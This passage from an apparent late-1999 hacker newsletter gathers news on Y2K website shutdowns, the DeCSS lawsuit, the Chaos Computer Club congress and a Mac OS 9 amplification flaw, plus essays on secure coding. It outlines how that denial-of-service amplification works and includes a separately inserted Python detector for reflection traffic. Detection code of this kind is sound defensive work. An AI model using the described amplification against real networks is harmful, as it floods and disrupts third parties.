Timothy Conley, deputy director of the 88th Communications Group at Wright-Patterson Air Force Base in Dayton, estimates there are about 30 public Web sites maintained at the base - from pages for the United States Air Force Museum to the Air Force Institute of Technology.
The concern, he said, is that hackers emboldened by widespread Y2K computer concerns could insert viruses that would alter or destroy information on the sites.

``We feel they may plant some things on servers or e-mail that might go off after (Jan. 1),'' Conley said.

He said there is no threat to national security because the public-access sites are separated from secure sites, which will remain operational.

The Pentagon's main Web site should stay operational over the weekend, said spokeswoman Susan Hansen. Even so, officials there have voiced concern about attacks from cyberspace, and say special precautions will be taken.

Each of the military services has its own network monitoring stations, and a centralized Pentagon network monitoring system has been set up in Arlington, Va.

Jim Neighbors, manager of the Air Force's Y2K program, said any attacks on the Air Force sites would amount to a nuisance.

``I liken it to somebody going in and defacing a wall with a can of spray paint,'' he said.

@HWA

26.0 Sweden Plans Cyber Defense and Attack Force 12/28/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/
contributed by erewhon

The Swedish government has issued orders for the armed forces to train cyber soldiers to protect the nation's infrastructure from attack as well as destroy hostile systems. (Once again the mainstream media is months behind the times. HNN reported on this story back in July.)

Associated Press - via Washington Post
http://www.washingtonpost.com/wp-srv/aponline/19991227/aponline101858_000.htm

(Sorry, link provided a 404 - article unavailable.
- Ed)

HNN Archive for July 14, 1999
http://www.hackernews.com/arch.html?071499#3

@HWA

27.0 DVD Industry Files Lawsuit Over DeCSS 12/29/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/
contributed by Space Rogue

As reported yesterday by HNN the DVD industry has filed suit in Santa Clara Superior court against numerous people (many to be named later) for posting or even linking to DeCSS. DeCSS is software that can unlock the encryption scheme for DVD disks which can then be used to view your movies on your computer; it could also be used to illegally copy DVDs.

Wired
http://www.wired.com/news/business/0,1367,33303,00.html

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2414488,00.html?chkpt=zdnntop

Washington Post
http://www.washingtonpost.com/wp-srv/WPlate/1999-12/29/026l-122999-idx.html

HNN's copy of the legal complaint
http://www.hackernews.com/special/1999/dvdinjunction.html

DeCSS Defense Site
http://www.lemuria.org/DeCSS/

DVD Copy Control Association
http://www.dvdcca.org/dvdcca/index.html

The legal angle of the DVD Industry's case will hinge on exactly how the DeCSS software was created and whether it was truly reverse engineered and if there was intent to cause harm to the industry.

Wired
http://www.wired.com/news/technology/0,1282,33311,00.html

The hearing has been scheduled for December 29, 1999, at the Superior Court of the State of California, County of Santa Clara to determine if a temporary restraining order should be granted against the named defendants.

PZ Communications
http://www.pzcommunications.com/decss/main.htm

@HWA

28.0 No Evidence of Y2K Viruses or Cyber Terrorist Attack 12/29/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/
contributed by Evil Wench

The National Infrastructure Protection Center has said that they have no evidence pointing to a wide scale cyber attack and so far no serious virus threats have been discovered.
NIPC has said that it does not expect large-scale U.S. infrastructure disruptions.

NY Times - Registration required. Just give 'em a fake address.
http://www.nytimes.com/library/tech/99/12/biztech/articles/29secure.html

December 29, 1999

Experts Play Down Virus Threat to Computers Over the Holiday
By JOHN MARKOFF

SAN FRANCISCO, Dec. 28 -- Though still maintaining a nervous vigilance, computer security experts in the government and private sectors said today that almost no evidence had yet materialized that hackers or terrorists were plotting widespread disruption of computer networks over the New Year's weekend.

Since midsummer, concern has been raised, sometimes with a tone of alarm, that cybercriminals and political terrorists would mark the rollover to the new millennium by planting various kinds of malicious software in networks and computer systems.

However, very little evidence of such activity has emerged in recent weeks, and today the Government's National Infrastructure Protection Center said that it expected no "large-scale U.S. infrastructure disruptions" from Year 2000, or Y2K, computer failures during the next few weeks.

Moreover, because of greatly heightened surveillance that is planned for computer networks around the globe on New Year's Eve and the following days, many experts say that now would actually be the worst time to try an attack.

Nevertheless, the federal agency also said it was preparing for a possible increase in criminal activity, in part because of heightened media attention to Year 2000 threats.

The agency identified four viruses that it said were of particular concern. The first three, known as Microsoft Word macro viruses, use a programming language inside the word processing program to spread through networks. The fourth, identified as PC CIH, is an older program that can seriously damage infected machines.
And yesterday an administration official said that despite the fact that no widespread attacks were expected there is still concern about the potential for damage from malicious programs.

"The criminal element has latched on to cyberintrusion as a good avenue," said the official, who spoke on the condition that he not be identified. "Obviously, this is an issue of concern."

Kathy Fithen, manager of the Computer Emergency Response Team Coordination Center at Carnegie-Mellon University, said: "Right now we're not seeing anything out of the ordinary. For Jan. 1, the biggest thing we anticipate is computer viruses that have targeted that date to execute."

Last week, the Government official in charge of protecting the nation's electronic infrastructure said he knew of no documented cases in which malicious software had been implanted during efforts to fix Year 2000 errors.

Earlier this year, various experts had voiced concerns that in the frenzy to make repairs to software, a few rogue programmers hired as temporary workers might secretly build in "back doors" that could later be exploited by criminals to invade networks without setting off computer security systems.

In July, the Gartner Group, a computer consulting and market research firm, predicted at least one theft of $1 billion next year directly resulting from this year's repairs.

The threat alone can be costly. Even if would-be intruders fail to exploit such a back door, an organization that suspects that its software has been compromised must assign its best engineers to systematically examine enormous amounts of code for tiny, hard-to-find alterations.

Bruce Schneier, president of Counterpane Internet Security Inc. in San Jose, Calif., said such back-door attacks had been extremely rare, and last week, Richard A. Clarke, the president's national coordinator for computer infrastructure security and counterterrorism, said the government had not documented a single such security breach.
This week, Gartner Group's computer security experts acknowledged a lack of evidence for secret back doors.

"I've heard lots of stories," said William Spernow, the research director for Gartner's information security strategies group. "But when I have asked for the code, I've gotten nothing."

One computer security firm that has assessed the added risk from Year 2000-related viruses and security attacks estimated that the odds of a major "virus event" for the period were about 1 in 14, or 7 percent. The firm, ICSA.net, also placed odds of a single attacker breaching 100 or more computer sites over the weekend at 9 percent.

Several antivirus software companies today said that while they would not rule out the possibility of a widespread destructive event over the weekend, they had not seen evidence of such viruses yet.

"Nothing happened over Christmas, which may be a pretty good indication that nothing major will happen on Jan. 1," said Vincent Gullotto, director of the anti-virus emergency response team at Network Associates, a Silicon Valley software publisher.

@HWA

29.0 Pentagon and Others Take Air Force Lead and Shut Down Sites 12/29/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/
contributed by Code Kid

The Pentagon and the federal personnel agency will be taking the Air Force's lead and will be shutting down some of their public web sites over the new year thereby denying US citizens of their right to access public information. Fearing a massive 'hacker attack' the agencies have decided it is better to shut down the sites than repair any possible damage later. (If your web site is vulnerable today it will be vulnerable tomorrow. This tells me that you are not confident enough in your own web site's ability to fend off attack but you expect the American public to remain calm during the Y2K rollover.)
Associated Press
http://dailynews.yahoo.com/h/ap/19991228/tc/y2k_national_9.html

Reuters - via Yahoo
http://dailynews.yahoo.com/h/nm/19991228/wr/yk_hackers_2.html

AP:

Tuesday December 28 7:17 PM ET

Military Closing Web Sites for Y2K
By TOM RAUM Associated Press Writer

WASHINGTON (AP) - Taking last-minute precautions, the Pentagon and the federal personnel agency are shutting down some of their public Internet sites this weekend to keep them safe from computer hackers as the calendar rolls over to 2000.

And the Department of Veterans Affairs has decided to mail January benefit checks to more than 2.5 million veterans on Dec. 30, a day early, to avoid potential delays related to the Y2K computer bug, officials disclosed Tuesday.

The early mailings ``will mitigate unexpected year 2000 interruptions of benefit payments arising from anything outside our control,'' VA spokesman Terry Jemison said.

The Social Security administration announced last week that checks and electronic deposits for 44 million elderly and disabled Americans also would be dispatched for delivery a day early.

Y2K-compliant files for electronic Social Security payments will be at banks by Dec. 30 rather than the usual Dec. 31. Checks will be mailed earlier as well. Most people normally would receive Social Security benefits on Jan. 3.

While making some last-minute adjustments, the government continued to sound a note of optimism about the country's readiness.

The nation's top health official said people are not hoarding drugs so there will not be any shortages of medicine over New Year's.

``Americans have used common sense,'' Health and Human Services Secretary Donna Shalala said, citing a 60-90 day supply for nearly every category of medicine.

Federal officials also expressed confidence about 911 calls going through and public safety officials being able to dispatch services. But they advised Americans to keep emergency numbers on hand.
``There was a way to call the police, to call ambulance services, long before 911,'' Federal Communications Commissioner Michael Powell said.

Some problems, particularly overseas, may not become evident for weeks. And those that show up Jan. 1 in early time zones may not be a good predictor of what the United States can expect, according to Bruce McConnell, director of the United Nations International Y2K Cooperation Center.

Some of the government's emphasis switched from potential computer glitches - nearly all of these have been fixed, officials insist - to the threat of cyber attacks.

Many military installations around the country will be shutting down their Web sites temporarily as a safeguard against intrusions - as well as a protection against Year 2000 viruses that might be launched on New Year's Eve.

``Within some defense agencies, they have thought the most prudent action was just to take their sites offline,'' said Pentagon spokesman Adm. Craig Quigley.

While the Pentagon intends to keep its central Web site - www.defenselink.mil - in operation, Quigley said one site being temporarily blocked is that of the Defense Finance and Accounting Service, which oversees military pay.

``We're going the extra mile to make sure our people's pay isn't affected,'' Quigley said.

Also being taken offline this weekend: the Web site maintained by the Office of Personnel Management, which services the rest of the government payroll.

Susan Hansen, a Pentagon spokeswoman who deals with Y2K issues, said officials felt it was important to keep the main ``DefenseLink'' site up because ``that's how we will be transmitting information during the rollover.'' She said special precautions were taken to secure the site.

Bases temporarily closing their Web sites include Wright-Patterson Air Force Base in Dayton, Ohio. About 30 public sites are maintained at the base, including Web pages for the United States Air Force Museum and the Air Force Institute of Technology.
``We feel they (hackers) may plant some things on servers or e-mail that might go off'' after the New Year begins, said Timothy Conley, deputy director of the 88th Communications Group at Wright-Patterson.

He said there is no threat to national security because the public-access sites are separated from secure sites, which will remain operational.

The commandant of the Marine Corps., Gen. James L. Jones, canceled weekend travel plans, although aides said the changes were family-related and not prompted by fears of Y2K disruptions.

Capt. Pete Mitchell, a spokesman for the corps, said the Marines were taking various steps to make sure there is a ``seamless transition'' to 2000.

``It is a network security issue as much as it is a Y2K issue,'' said Mitchell. ``All the branches are beginning to do things to restrict, to limit the risks of intrusion by decreasing electronic footprints.''

In addition to tracking stations set up by each service, a centralized Pentagon network monitoring system has been set up.

As for civilian communications, industry and federal leaders reiterated their caution against people picking up the phone just to see if it is working or dialing 911 just to check it.

Too many callers at once could clog the network, meaning some might get a fast busy signal. But that wouldn't necessarily indicate any Y2K-related problems, said the FCC's Powell.

``This is a basic network congestion issue that we see every Mother's Day. This is Mother's Day on Viagra,'' he said.

The nation's largest telephone companies have said for months that their networks are ready. But officials say they have more limited information on international calling and smaller, rural U.S. phone companies.

Yahoo:

Tuesday December 28 9:46 PM ET

U.S. Air Force Cautions Web Sites on Y2K Hackers

WASHINGTON (Reuters) - The U.S.
Air Force has given its 900 public Web site managers permission to shut down the sites around the New Year to guard against computer hackers, an Air Force spokesman said on Tuesday.

``There is no specific threat, it's simply heightened security. If you're not up on the 31st, there is nothing they (hackers) can do about it,'' said spokesman Maj. Andree Swanson.

The message was delivered to the public Web site operators inside the Air Force, the people who run facility and base Web pages. None of the sites contains classified information.

``These decisions on whether to shut down or not is up to the individual Web site,'' Swanson said. The main Air Force page -- www.af.mil -- has no plans to close this weekend.

``They all have the option to shut down, but it's not mandatory. Some sites are more secure than others,'' Swanson said.

Hackers have invaded Air Force Web sites in the past, she said, noting that many such attackers are looking to make a name for themselves.

President Clinton's top aide on Y2K matters earlier this month asked computer hackers to exercise self-restraint until after Year 2000 technology fears have passed.

Y2K concerns revolve around computer systems programmed to read only the last two digits of a year. If left uncorrected, it is feared systems will read 2000 as 1900, causing widespread malfunction.

Adding to the anxiety are worries that hackers will take advantage of possible Y2K confusion to pierce computer security defenses.

@HWA

30.0 More from CCC Congress in Germany 12/29/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evenprime

As the latest Chaos Computer Club Congress goes into full swing during its second day Wired reporter Steve Kettmann issues his report. (I'm gonna hafta get over there one of these years.)

Wired
http://www.wired.com/news/culture/0,1284,33312,00.html

Chaos Computer Club
http://www.ccc.de/

Chaos Hackers Seek Order
by Steve Kettmann

3:00 a.m.
29.Dec.1999 PST

BERLIN -- Even if media-hyped panic over how computers will handle the Y2K changeover gets people worked up over nothing, the world could still be a better place as a result.

That, at least, was the impression emerging midway through this week's three-day Chaos Computer Club hacking congress here. The renowned visionaries of the CCC believe that technology matters a great deal in our lives, much more than most people believe, and are pleased to see the rest of the world catching up.

"The world is being reminded of how reliant on technology we are," said CCC leader Frank Rieger. "Even if nothing happens, we will know more about how technology and society are intertwined. Fortunately, in Germany there hasn't been much talk about hackers doing evil, the way there has in the United States. We have a very good standing here."

German politicians seek out CCC members as advisers: Club members gather to take on the big questions, too, not just to share tips on issues like "Buffer Overflows" -- the actual title for a Tuesday morning session at the congress.

No facet of the intertwining of society and technology is as dramatic as Tuesday's big theme -- the expanding reach of government surveillance, popularized in American movies like Enemy of the State.

One early-afternoon workshop urged people to cooperate in a project to map all the surveillance cameras in Cologne, and ultimately Germany. British signal intelligence expert and journalist Duncan Campbell gave an address on the extent world governments spy on each other -- and the rest of us, too.

Campbell described in detail the system of ground-based listening stations called Echelon that enables the US and British governments to intercept transmissions -- and, most important, sort the data, earmarking what receives closer scrutiny and filtering out what is to be ignored.
The European parliament is so concerned about Echelon -- whose existence is still officially questioned -- that it commissioned a report from Campbell and set hearings for this coming February. It's vindication for Campbell, who has sounded the alarm over government intrusion into privacy for decades, since first writing about the British version of the US National Security Agency in 1976. "This is really his finest hour," said Rop Gonggrijp, a hero to European hackers for organizing the 1997 outdoor hacker camp HIP. "A lot of people can see now that he wasn't just being paranoid when he said a lot of this 20 years ago. "It's hard to come to terms with the fact that so many people don't believe this is going on. You may have an idea about the scale of what your government does, but you have to sort of ditch all of what you thought you knew. Even people who have nothing to fear should be aware of this because it will give you an idea of how the world really works. All major wars have a signal intelligence component." Campbell believes that government agencies like the NSA, featured in 1998's Enemy of the State, are moving more in the direction of monitoring email and fax transmissions. "Certainly it's unbelievable that they would make so major an investment unless they are confident of getting into the big fiber-optic cables that will be the backbone of planetary communication in coming decades," he said. "Enemy of the State both helped and hurt," Campbell added. "It helped because it raised consciousness, but it hurt because it was off the wall. It creates an impression of surveillance that's quite obviously not possible. But that's Hollywood. "It's a very difficult area for people to understand and believe. Awareness is growing exponentially, first in Europe and also in the United States. The NSA will survive. But they are going to face a big shakeup. This creates the possibility that they can also be shaken up in areas that lead to the protection of privacy." 
@HWA

31.0 Apple Patches OS 9 Security Hole 12/29/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue

A hole in the TCP/IP protocol stack on MacOS 9 could leave users' systems open to launching a distributed attack without the users' knowledge. MacOS 9's networking software, Open Transport, will automatically respond to certain data packets; by triggering numerous machines an attacker could overwhelm a target site, creating a denial of service attack. Apple released a patch within hours of notification. (And during the holidays as well, yeah Apple.)

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2414764,00.html?chkpt=zdnntop

C|Net
http://news.cnet.com/news/0-1003-200-1508646.html?tag=st.ne.1002.thed.1003-200-1508646

Open Transport Tuner 1.0
http://asu.info.apple.com/swupdates.nsf/artnum/n11559

ZDNet;

Apple patches OS 9 security hole

Responding to security alerts, Apple has released a patch for Mac OS 9 to prevent hacks of networked Macs.

By Dan Turner, MacWEEK.com
December 28, 1999 5:59 PM PT

Apple Computer Inc. late Tuesday released a patch for Mac OS 9's Open Transport networking protocol to correct a "flaw" that leaves Macs vulnerable to hackers who could enlist the computers over an Internet connection in distributed denial-of-service (DOS) attacks without the users' knowledge.

The flaw was discovered by Professor John Copeland of the Georgia Institute of Technology, who heads that school's School of Electrical and Computer Engineering. Only Macs that are running Mac OS 9 and are attached to "always-on" Internet connections, such as digital subscriber lines (DSLs) and cable modems, are vulnerable, Copeland said.

In an advisory from Carnegie Mellon University's computer security center, Apple acknowledged earlier today that it "reproduced the problem" and was "moving quickly to put a solution in place." Hours later Apple posted the patch, Open Transport Tuner 1.0, on its Software Updates Web page.
Copeland told MacWEEK that attackers can "scan" cable or DSL networks for computers running Mac OS 9; these Macs can then be sent a small (29-byte) packet of data, which Mac OS 9 replies to with a 1,500-byte datagram. "This appears to be the way Mac OS 9 explores an Internet route," Copeland said.

Attackers can then send "trigger datagrams" with a false source address (that of their target) to a large number of Mac OS 9 computers. If these triggers are sent in rapid succession, Copeland said, the "amplified" responses can overwhelm the target's Internet connection, denying service to that target.

Although DOS attacks are a fact of life on the Internet, "it's much harder to stop a distributed attack," Copeland said, because the sources of the attack aren't even aware of their part in it, even as it occurs.

Prior to Apple's (Nasdaq: AAPL) release of the patch, the only sure defense against this exploit was for users to turn off or disconnect their Internet connection, Copeland said.

"I've seen scans of this nature but no attacks yet," said Copeland, who posted online warnings of this type of DOS attack on New Year's Eve. However, Copeland told MacWEEK his warnings are "pure speculation."

-=-

Net attacks could come through latest Apple system

By Jim Davis
Staff Writer, CNET News.com
December 29, 1999, 11:45 a.m. PT

update Computers with the newest version of Apple's Macintosh operating system software could be used as unwitting aides to the latest fad in Internet attacks, according to a new report.

Customers who have installed Mac OS 9 are susceptible to being used in "denial of service" attacks from malicious programmers if their computer is hooked up to the Internet via "always on" digital subscriber line (DSL) or cable modem connections.

The computer expert who discovered the flaw said that it does not appear that Mac computers themselves are being shut down by attacks, but that they merely are capable of being used as pawns to harm other computers.

Dr.
John Copeland, who chairs the Georgia Institute of Technology's School of Electrical and Computer Engineering, said the correction for the flaw needs to be applied before New Year's Eve in order to prevent the Macs from being used to attack other computers. As previously reported by CNET News.com, security experts have warned of a possible concerted effort to attack computers on New Year's Eve. Apple has already issued a fix for the problem at its Web site. Carnegie Mellon University's Computer Emergency Response Team (CERT) said in an advisory note that "Intruders can flood networks with overwhelming amounts of traffic or cause machines to crash or otherwise become unstable." It does not appear that any computers have yet to be used in such attacks; CERT merely reported that such an attack was possible. Cupertino, Calif.-based Apple said in a posted reply to the CERT team: "We've reproduced the problem in our labs. The problem only affects customers running our most recent release of networking software on machines that are continuously attached to the Internet." "Apple is aware of the CERT advisory and has taken steps to address it," confirmed an Apple spokesman. "While we believe the potential risks to our customers is extremely small, we have worked quickly to provide the latest and most secure software to Mac users," he said. In addition to being able to download the fix and installing the software themselves, Mac OS 9 is capable of automatically updating itself with this fix as it becomes available later on specialized Apple servers, but only when the feature is enabled by the user. Most Macintosh customers are not affected by this problem, Apple said. Denial of service attacks aren't new, but there has been a sudden surge in them. Recently, two new families of attacking programs, called the "Tribe Flood Network" and "Trinoo" were identified by experts. Computer experts believe that some attacks are timed to go off when the century turns. 
Generally, denial of service attacks work like this: An attacker secretly embeds software into hundreds of unwitting computers. Then, at a selected time, a command is issued that prompts the infected computers to swamp a target Web site or server with messages in a method of attack called "denial of service." The program doesn't damage the "infected" carrier computers or the target, but the sudden flood of messages typically knocks out the target system. The flaw in the Apple networking software, called Open Transport, could allow an outsider to use a targeted Mac computer as a carrier. Although it's possible for target computers to protect themselves from denial-of-service attacks by ignoring messages, it's hard to identify which computers are attacking them--especially when there are hundreds. This fundamental vulnerability of networked computers makes protecting against denial-of-service attacks extremely difficult. A study released earlier this year reported that computer security breaches were up 16 percent from 1996 to 1997, and that computer-related crime, including security breaches, had cost 241 surveyed organizations $136 million last year. Users of Macintosh computers, in general, have had fewer security issues to deal with over the last few years, in part because there were simply more Windows-based computers to target. But the system itself isn't impervious to the usual array of viruses and other security issues--and neither is the software that runs on it. Last week, for instance, Microsoft said it resolved a potentially troublesome security problem that would have affected online shoppers using the Macintosh version of Internet Explorer. The company issued software that fixes a glitch in the IE 4.5 Web browser which may have made shopping via the Net a risky proposition if not fixed before Jan. 1, 2000. The new Mac OS 9 security issue was first reported at the Macweek Web site. 
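The amplification Copeland describes (a 29-byte trigger answered with a 1,500-byte datagram sent to a forged source address) leaves a recognisable pattern in traffic records on the network where the Macs sit. The following Python detector is an added example, not part of the reprinted articles; the record format, the addresses, the thresholds and the names `Datagram`, `find_reflection` and `constructed_sample` are assumptions made for illustration.

```python
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Datagram:
    ts: float   # capture time in seconds
    src: str    # source address as written in the packet (may be forged)
    dst: str    # destination address
    size: int   # datagram length in bytes


def find_reflection(records, local_hosts, min_ratio=10.0, min_triggers=5,
                    reply_window=1.0):
    """Group suspected reflection traffic by the address the replies go to.

    A local host counts as a reflector for a remote address when at least
    min_triggers inbound datagrams carrying that address as source were each
    answered within reply_window seconds, and the answers carried at least
    min_ratio times as many bytes as the triggers. The remote address is the
    probable victim, not the sender: the triggers' source field is forged.
    """
    pending = defaultdict(deque)            # (local, remote) -> unanswered triggers
    stats = defaultdict(lambda: [0, 0, 0])  # (local, remote) -> pairs, bytes in, bytes out

    for d in sorted(records, key=lambda r: r.ts):
        if d.dst in local_hosts and d.src not in local_hosts:
            pending[(d.dst, d.src)].append(d)
        elif d.src in local_hosts and d.dst not in local_hosts:
            queue = pending[(d.src, d.dst)]
            # Drop triggers too old to have caused this reply.
            while queue and d.ts - queue[0].ts > reply_window:
                queue.popleft()
            if queue:
                trigger = queue.popleft()
                s = stats[(d.src, d.dst)]
                s[0] += 1
                s[1] += trigger.size
                s[2] += d.size

    report = {}
    for (local, remote), (pairs, b_in, b_out) in stats.items():
        if pairs >= min_triggers and b_in > 0 and b_out >= min_ratio * b_in:
            entry = report.setdefault(
                remote, {"reflectors": set(), "bytes_in": 0, "bytes_out": 0})
            entry["reflectors"].add(local)
            entry["bytes_in"] += b_in
            entry["bytes_out"] += b_out
    for entry in report.values():
        entry["ratio"] = round(entry["bytes_out"] / entry["bytes_in"], 1)
    return report


def constructed_sample():
    """Constructed records (documentation address ranges), not captured traffic."""
    victim = "203.0.113.5"
    macs = ["198.51.100.10", "198.51.100.11", "198.51.100.12"]
    records = []
    # Three always-on hosts each answer six forged 29-byte triggers
    # with 1,500-byte datagrams, the sizes given in the article.
    for mac in macs:
        for i in range(6):
            t = i * 0.1
            records.append(Datagram(t, victim, mac, 29))
            records.append(Datagram(t + 0.01, mac, victim, 1500))
    # Ordinary request/response traffic with a 2:1 ratio, for contrast.
    for i in range(6):
        t = i * 0.5
        records.append(Datagram(t, "192.0.2.53", "198.51.100.20", 60))
        records.append(Datagram(t + 0.02, "198.51.100.20", "192.0.2.53", 120))
    return records, set(macs) | {"198.51.100.20"}


if __name__ == "__main__":
    recs, local = constructed_sample()
    for target, info in find_reflection(recs, local).items():
        print(target, sorted(info["reflectors"]), info["ratio"])
```

Hosts reported as reflectors are the ones that need the Open Transport Tuner 1.0 patch the articles mention; the address they are grouped under is the connection being flooded.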
@HWA

32.0 The need for physical security - Securing the OpenBSD console 12/29/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by grant

A white paper from 2600 Australia has been released that covers the need for and reasoning behind physical security of both the console and storage devices of a particular computer and some distilled advice from the misc@openbsd.org mailing list on ways in which the OpenBSD console might be secured from unpassworded physical access.

2600 Australia
http://www.2600.org.au/openbsd-console.html

@HWA

33.0 New Era: Buffer Overflow Article by evenprime 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

A buffer overflow original article.

contributed by evenprime

Y2K has come and gone and left most people pretty much unscathed. The massive effort to clean up messy code over the last few years looks like it has paid off. What can be learned from this? How can this be applied to writing secure software for the coming millennium? This new article in the Buffer Overflow section examines these questions.

Buffer Overflow
http://www.hackernews.com/bufferoverflow/index.html

A New Era

Written By: evenprime

It is customary to do some reflection this time of year, and I've been doing a little thinking about Y2K. I suppose that makes sense, since it was the part of computing that got the most media coverage the past year. It looks like the date change caused very few problems, and most of those were extremely minor. Still, there are lessons that can be learned from the things that did happen.

It took a lot of time, effort and money to ensure that the date change was uneventful. One thing to learn from Y2K is that it is difficult to fix a program after it is developed and implemented.
Getting all the bugs out of a piece of software that's currently in production usually requires having an outside set of eyes look at the code, as the Social Security Administration recently found out. The application of this principle to the open source movement is evident [1], but even closed source developers can benefit by having their work audited by someone outside the development team, or better yet, outside the company. The DVD Copy Control Association have amply demonstrated the dangers [2] of trying to locate your own design flaws instead of letting someone else examine your work.

Look back at how programming has been done, and at what it has achieved. Date related bugs were everywhere, and had to be fixed. Security bugs are still everywhere. Unchecked input to static buffers, race conditions, and programs that are installed with too many privileges are all around us. All these things come from the same source: a method of software development that focuses on immediate results.

It seems like the only concern most developers have is that the program they write works today, in our current network environment, with the input they expect it to receive. That's a flawed way to look at software use. Y2K has taught us that the things we write will be used far longer than we expect. Users ensure that our programs will receive input that is not what we anticipated. [3] This may be true even if our intended users are not looking for bugs. :) I once wrote a user management script that, due to not checking operator input, was capable of preventing the entire user population from getting to applications necessary for their jobs. A beginner's mistake, but one that showed me how important it is to design programs so that they fail gracefully.

The software problems we have are not new. Lions wrote about race conditions back in 1977 [4]. Dr. Mudge was writing about buffer overflows back in 1995. [5] Where has this gotten us?
Last week bugtraq readers were informed of a root compromise via a race condition, and there were six security-related buffer overflows. There are tools [6] and techniques [7] out there to assist in secure programming, but very few people use them, so we keep seeing the same types of mistakes.

Politicians have noticed the net, and they tend to think it is fairly important stuff. They have been tossing around terms like "Information Super-highway". Presidential Directives [8] have declared computer networks to be part of "America's Critical Infrastructure". The FBI has set up the National Infrastructure Protection Center to guard our networks. Infrastructures are things that are built to last, and when people begin comparing our computer programs to them, we ought to consider the assumptions being made by the users.

The highway analogy is kind of interesting; the engineers responsible for highways add safety berms and guard rails to their designs, and they don't run the roads over quicksand. They try to incorporate safety into the design while it is still in the planning stages. If the rest of the world thinks that we are designing an infrastructure, this industry needs to step back and look at what it is doing.

Y2K has taught us that we may be using today's programs for a long, long time, so perhaps we should begin to develop with a different emphasis. This is a good time to consider abandoning the "functionality first" way of doing things and adopting a "durability first" mind set. After all, a new millennium seems like a good time to begin a new era of software development.

1. "Open source keeps designers honest. By depriving them of the crutch of obscurity, it forces them towards using methods that are provably secure not only against known attacks but against all possible attacks by an intruder with full knowledge of the system and its source code. This is real security, the kind cryptographers and other professional paranoids respect."
- ESR
http://www.tuxedo.org/~esr/writings/quake-cheats.html
http://www.tuxedo.org/~esr/writings/cathedral-bazaar/cathedral-bazaar.html

2. "The lesson: This is yet another example of an industry meeting in secret and designing a proprietary encryption algorithm and protocol that ends up being embarrassingly weak. I never understand why people don't use open, published, trusted encryption algorithms and protocols. They're always better."
- Bruce Schneier
http://www.counterpane.com/crypto-gram-9911.html#DVDEncryptionBroken

3. "Security engineering involves making sure things do not fail in the presence of an intelligent and malicious adversary who forces faults at precisely the worst time and in precisely the worst way."
- Bruce Schneier
http://www.counterpane.com/crypto-gram-9911.html#WhyComputersareInsecure

4. The code for "swap" has a number of interesting features. In particular it displays in microcosm the problems of race conditions when several processes are running together....What happens next depends on the order in which process A and process B are reactivated. (Since they both have the same priority, "PSWP", it is a toss-up which goes first.)
Lions, J., 1977. p. 15-2, "A commentary on the UNIX operating system"

5. http://vapid.dhs.org/Library/bufferov.html

6. http://www.l0pht.com/slint.html

7. http://www.unixpower.org/security/

8. http://www.fas.org/irp/offdocs/pdd/index.html (#62 & #63)

@HWA

34.0 Gangly Mentality, the Y2K hype by ytcracker 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

A buffer overflow HNN original article.

Gangly Mentality

The story of the great Y2K swindle and what is to come.

by YTCracker(phed@felons.org)

The Setup

What do billions of dollars, billions of useless books, and billions of prophetic statements have in common?
If you guessed the infamous Y2K rollover, you are probably one of the millions of people who were informed of some global catastrophe set to take place the first of this year. There was not a paper in publication these last few years that didn't mention some sort of doomsday consequence related to our society's dependency on computers.

If you are any kind of normal human being you would have expected something interesting out of this entire fiasco. I expected something self-fulfilling. Mobs of fanatics and drunks taking to the streets with automatic weapons shouting verses out of the Bible, siphoning gas and stealing stereo equipment. The most eventful happenings in Denver and Colorado Springs were a few kids begging the cops to beat them. It was worse than that when the Broncos won the Super Bowl.

Digitally, I was surprised to see the overall lack of systems compromised. I expected Attrition to be flooded up to their necks in defacements. The staff had informed me that they were planning on keeping a pretty good monitor on things. Their major concern was cross-continental defacements that represented some anti-government motives. Sadly, there was no large-scale cyber-shootout. All was quiet in the land of the double-oh.

However, I don't think that we are out of the clear yet. A few issues still need to be addressed. Just because the infamous "Millennium Bug" turned out to be a farce[in a general sense] does not constitute a sigh of relief. Every threat that took place before the rollover is just as real. Every security issue unaddressed prior to the first is still something to reckon with. I would argue that we have introduced a whole breed of new problems that have absolutely nothing to do with something so trivial as a system date.

The History

There was a time when the Internet was occupied by a select few. In order to participate you required a little more than standard knowledge of a computer.
If you didn't have some kind of dialup account provided by your employer you were forced to shell out a great deal of money for a meager ten hours. This regulation provided a positive future for the Internet; a handful of knowledgeable people were constructing the fabric of the system while another handful of knowledgeable people were engaging in mastering it. The only browser that anyone used was NCSA Mosaic. Any application you used was from the Trumpet Software suite. All the files you ever wanted you obtained from Walnut Creek or the Washington Archives. This environment led to quick growth and a plethora of new frontiers. In recent times, manufacturers have made it incredibly easy to hop on the bandwagon and begin anew through your phone line. Granted, this is a great thing. The Internet is probably the single greatest invention of the twentieth century. It possesses an endless wealth of knowledge and power at your fingertips. These extremely positive qualities make it very hard to believe that there is a downside. An obvious issue is this recent obsession with the New Year. If another Melissa virus or Y2K-ish event emerges the media will overexpose it beyond its true threat. Many elements play into this exposure ranging from computers rapidly becoming a part of everyone's life to a reporter's burning urge to write a great story. What can we attribute this obsession to? Ignorance. As aforementioned, the Internet is no longer occupied by a majority of intelligent and computer-literate individuals. It is very simple to just 